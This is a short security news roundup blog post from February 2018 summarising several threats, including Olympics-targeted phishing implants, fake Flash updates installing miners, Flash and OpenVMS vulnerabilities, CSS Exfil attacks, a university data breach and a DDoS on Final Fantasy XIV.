Share Blog post
Hackers are launching phishing campaigns--that are downloading malicious implants--targeting organizations that are involved in the 2018 Winter Olympics. Named Gold Dragon, Brave Prince, Ghost419, and RunningRat, these implants surface once an initial PowerShell backdoor is installed.
Gold Dragon, a data-gathering implant, generates a key to encrypt data from the infected system and sends the data over to a remote server.
Fake Flash update drops CPU miners
A software touting as a Flash update is installing CPU miners in victim's computers. The miners are propagating using fake Facebook video pages that asked users to install a Flash player to continue. Thus, tricking users into downloading the miner.
Security patches have been released for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS to address critical vulnerabilities, CVE-2018-4878 and CVE-2018-4877. These flaws were found to allow remote code execution. Users are advised to update to Adobe Flash Player 188.8.131.52 to stay safe.
Exploitable bug affecting Alpha and Itanium systems
A privilege escalation flaw has been found in OpenVMS OS running on VAX and Alpha processors. The bug, dubbed CVE-2017-17482, could also affect Intel Itanium systems in mixed-architecture clusters. The vulnerability stems from a cockup in the command processing code within the VMS shell, called DCL.
CSS Exfil attack
Ever since CSS has become a mainstay for Web pages, hackers have started launching CSS Exfil attacks. Poor programming could result in creating vulnerabilities on the page. To stay safe, users are advised to implement the Content Security Policy, (CSP), which is an added security layer.
University of Northern Colorado (UNC) recently suffered a data breach, resulting in leakage of personal information of 12 employees. Hackers stole social security numbers of these employees to reset their passwords and access their accounts. Victims' W2 forms were also stolen.
DDoS attacks on Final Fantasy XIV network
A network which hosts Final Fantasy XIV game was disrupted due to a distributed denial of service (DDoS) attack. This resulted in players experiencing difficulty in logging in to JP data center Worlds, and accessing, sending and receiving data from JP data centers.
Posted on: February 07, 2018
Get the Daily Threat Briefing delivered to your email!
More from Cyware
Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.